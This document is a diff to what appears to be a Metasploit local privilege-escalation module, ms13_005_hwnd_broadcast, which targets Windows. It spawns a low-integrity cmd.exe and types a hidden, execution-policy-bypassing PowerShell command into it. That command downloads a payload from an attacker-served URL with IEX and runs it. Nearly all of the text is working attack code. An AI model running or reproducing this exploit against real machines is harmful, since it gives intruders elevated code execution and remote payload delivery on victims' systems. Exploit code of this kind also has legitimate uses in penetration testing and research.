back to cmd

Author: Meatballs1

modules/exploits/windows/local/ms13_005.rb renamed to modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb

@@ -83,7 +83,7 @@ def win_shift(number)
 	def count_cmd_procs
 		count = 0
 		client.sys.process.each_process do |proc|
-			if proc['name'] == 'powershell.exe'
+			if proc['name'] == 'cmd.exe'
 				count += 1
 			end
 		end
@@ -93,14 +93,13 @@ def count_cmd_procs
 	end
 
 	def cleanup
-		if datastore['SPAWN_PROMPT']
+		if datastore['SPAWN_PROMPT'] and @hwin
 			vprint_status("Rehiding window...")
-			#client.railgun.user32.ShowWindow(@hwin, 0)
+			client.railgun.user32.ShowWindow(@hwin, 0)
 		end
 	end
 
 	def primer
-		start_service
 		# syinfo is only on meterpreter sessions
 		e = "V2FrZSB1cCwgTmVvLi4uDQpUaGUgTWF0cml4IGhhcyB5b3UuLi4NCkZvbGxv\ndyB0aGUgV2hpdGUgUmFiYml0Lg=="
 		print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
@@ -116,7 +115,7 @@ def primer
 			# Spawn low integrity cmd.exe
 			print_status("Spawning Low Integrity Cmd Prompt")
 			windir = client.fs.file.expand_path("%windir%")
-			li_cmd_pid = client.sys.process.execute("powershell.exe", nil, {'Hidden' => false }).pid
+			li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
 
 			count = count_cmd_procs
 			spawned = false
@@ -143,7 +142,7 @@ def primer
 		data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
 		url = get_uri()
 		download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-		command = download_and_run
+		command = "powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}"
 		command = Rex::Text.decode_base64(e) if datastore['EEGG']
 		command.each_char do |c|
 			print c if command.length < 200